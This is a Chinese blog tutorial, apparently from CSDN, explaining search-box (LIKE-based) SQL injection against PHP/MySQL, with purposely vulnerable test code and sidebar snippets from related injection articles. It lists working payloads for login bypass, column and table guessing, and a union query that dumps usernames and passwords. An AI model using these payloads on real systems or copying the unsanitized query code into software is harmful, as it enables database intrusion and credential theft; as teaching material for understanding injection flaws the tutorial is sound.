mysql搜索型注入_SQL注入-搜索型输入

最新推荐文章于 2024-06-30 07:00:00 发布
最新推荐文章于 2024-06-30 07:00:00 发布
阅读量1.1k 收藏 5
点赞数
文章标签: mysql搜索型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28717611/article/details/114860657
版权

一、搜索型注入简介与原理

1)简介

一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:

其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入。

2)原理

$sql="select * from user where password like '%$pwd%' order by password";

这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?

'and 1=1 and '%'='

这样的话这句SQL语句就变成了这样:

select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

存在SQL注入。

二、搜索型注入判断

判断搜索型注入的方法:

1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;

2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;

3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况

4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了

下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='

三、搜索型注入实战

1)GET型注入

测试源码:

$pwd=$_GET['pwd'];

$conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库

if($conn){

echo "连接数据库成功!";

}//判断连接是否成功

echo "
";

mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)

$sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句

$result=mysql_query($sql);

while($row = mysql_fetch_array($result)){

echo "用户ID:".$row['id']."
";

echo "用户名:".$row['username']."
";

echo "用户密码:".$row['password']."
";

echo "用户邮箱:".$row['email']."
";

}

mysql_close($conn); //关闭数据库连接

echo "

";

echo "你当前执行的sql语句为:"."
";

echo $sql;

?>

1.判断字段数

语句:

%' union select 1,2,3,4,...... and '%'='

2c027d3ef27b15a3796256b5f5a70266.png

还有种方法

语句:

%' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='

把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。

c35d19529957dc67bd95d1f5381c3240.png

2.判断表名

语句:

%'and(select count(*)from admin)>0 and '%'='

b705c6b738acf3525a50eaba4566cc15.png

把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。

3.猜解密码

由于这里用的就是密码,所以这里换成猜解用户名

2)POST型注入

测试源码:

//--------------------------post处理--------------------------------//

$name=addslashes($_POST['n']);

$pass=addslashes($_POST['p']);

$conn = mysql_connect('127.0.0.1','root','123');

if($conn){

echo "mysql连接成功";

echo "

";

}

mysql_select_db('fendo',$conn);

$sql="select * from user where username='$name' and password='$pass'";

$result=mysql_query($sql);

mysql_close($conn);

while($row = mysql_fetch_array($result)){

echo "用户ID:".$row['id']."
";

echo "用户名:".$row['username']."
";

echo "用户密码:".$row['password']."
";

}

echo "当前执行的sql语句:".$sql;

?>

账号:

密码:

e1a8ce90c6dcc5bafaecbc249d03f4c8.png

1.判断是否存在SQL注入

用PHP万能密码进行测试

' or 1=1#

caef38bced6be287a69b37b412beada7.png

在用户名里输入万能密码如果没报错,就说明存在SQL注入。

2.猜字段数

' order by 4#

a2e68b0c42d1123e4224b2249d32df5c.png

逐次更改数字去猜,直到不报错为止。

3.猜表名

'or 1=1 union select 1,2,3,4 #

a57f3dd1b88387b2ef56bdfdf70fec5d.png

逐次累加数字,直到不报错为止。

4.猜内容

替换1,2,3为你想要获得的内容

adc60076de8c903d97ae4b847556424c.png

'or 1=1 union select username,password,3,4 from user#

标签:sql,echo,搜索,输入,SQL,password,select,row

来源: https://blog.csdn.net/weixin_42277564/article/details/94401484

林罗
关注
SQL注入——搜索注入
zjdda的博客
05-30 7510
搜索注入原理 语句构造
concat mysql sql注入_sql注入总结(一)--2018自我整理
weixin_42516040的博客
12-29 290
SQL注入总结前言:本文和之后的总结都是进行总结,详细实现过程细节可能不会写出来~所有sql语句均是mysql数据库的,其他数据库可能有些函数不同,但是方法大致相同0x00 SQL注入原理:SQL注入实质上是将用户传入的参数没有进行严格的处理拼接sql语句的执行字符串中。可能存在注入的地方有:登陆页面,搜索,获取HTTP头的信息(client-ip , x-forward-of),订单处理(二次注...
mysql搜索注入_SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
weixin_39668965的博客
01-19 274
一、搜索注入简介与原理1)简介一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:其中又分为POST/GET,GET的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索注入又称为文本框注入...
搜索注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
JDBC_MYSQL.rar_JDBC-MYSQL_java jdbc mysql_java sql 简单
09-21
- 使用PreparedStatement可以防止SQL注入攻击,并提高查询效率。 7. **事务管理**: - JDBC提供对数据库事务的支持,通过`Connection`对象的`setAutoCommit(false)`来禁用自动提交,然后手动调用`commit()`或`...
sql_node-master.zip_MYSQL_node笔记_sql
09-25
为了防止SQL注入,应使用预编译语句和参数绑定。例如: ```javascript const [rows, fields] = await connection.execute( 'SELECT * FROM users WHERE id = ? AND active = ?', [userId, true] ); ``` 7. *...
login_and_register-form-with-mysql-source-code-Form source code
03-25
7. **防止SQL注入**:源代码应包含防止SQL注入的措施,如使用预处理语句或参数化查询,避免恶意用户利用SQL命令破坏或访问数据库。 8. **错误处理和日志记录**:当出现错误时,系统应能适当地通知用户,并记录错误...
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 701
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL 中 utf8_unicode_ci 和 utf8_general...
mysql搜索注入_pikachu-搜索注入 #手工注入
weixin_28745525的博客
02-28 358
1.搜索注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。2.搜索注入的类:同其他注入相同,由于提交表单的不同,可分为GET(多出现于网站上的搜索)和POST(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在的漏洞。3.原理分析:select us...
mysql搜索注入_MySQL搜索盲注笔记
weixin_39868959的博客
01-19 286
某大牛遇到个搜索注入,工具不好跑,于是相约一起手工,但我是菜逼,在查阅了文献并且经过疯子大牛的悉心提点下,便写下这篇笔记,和其他盲注手法一样,通过判断页面回显情况来进行注入=。=注入点报错如下:通过报错得知,这是个Mysql的库0×01-判断数据库版本通过left()截取,判断语句如下%'and(SELECT left(version(),1)>4) and '%'=' /*回显正常*/...
SQL注入搜索注入
qxx5203的博客
07-22 2689
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未注册!搜索框内输入a正常回显。...
搜索注入
Coisini的博客
05-26 1691
1判断: 关键字%’ and 1=1 and ‘%’=’ 返回正常 关键字%’ and 1=2 and ‘%’=’ 返回错误 %25%25%25%27%09and%091=1%23 %09代替空格法 2找出keyword post方式得抓抱:(变量放在最后面,就可以直接放工具跑) http://zhaojiu.jxau.edu.cn/Web_News/Search.asp?style=3&...
mysql搜索注入_各类注入汇总及简单绕过思路
weixin_33751197的博客
02-08 431
数字注入:www.secist.com/news.asp?id=11select * from news where id=11www.secist.com/news.asp?id=11 and 1=1select * from news where id=11 and 1=1字符注入:www.secist.com/news.asp?id=你好select * from news where ...
mysql+php搜索注入问题记录
cnbird's blog
01-17 2722
http://xxx.com/search.php?dy=a%' and 1=1-- 错误 http://xxx.com/search.php?dy=a%' and 1=2-- 错误 http://xxx.com/search.php?dy=a%' and 1=1 and '%'=' 正常 http://xxx.com/search.php?dy=a%' and 1=2 and '%'=
搜索及xxSQL注入
qq_45721814的博客
10-27 635
先打开pikachu平台打开搜索注入会打开以下界面 接着我们可以猜想它是不是使用数据库里的搜索功能来以此搜索的,我们来查看一下源代码会发现字符搜索的区别是搜索在引号中前后加了#字号,接着我们猜测用户名输入 然后打开xx注入自己猜测后输入,那么我们如果不知道这个是什么类,那我们如何猜呢比如 如果是username那么就应该是字符,用引号或者双引号闭合猜测所以 ...
3.SQL注入-搜索
最新发布
愿听风成曲
06-30 262
将payload输入搜索框会发现所有用户信息已出现。通过以上猜测进行构造payload语句。通过上图搜索可以猜测的sql语句为。输入k字段进行搜索发现出用户信息。后台代理逻辑,通过前端传入参数。
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值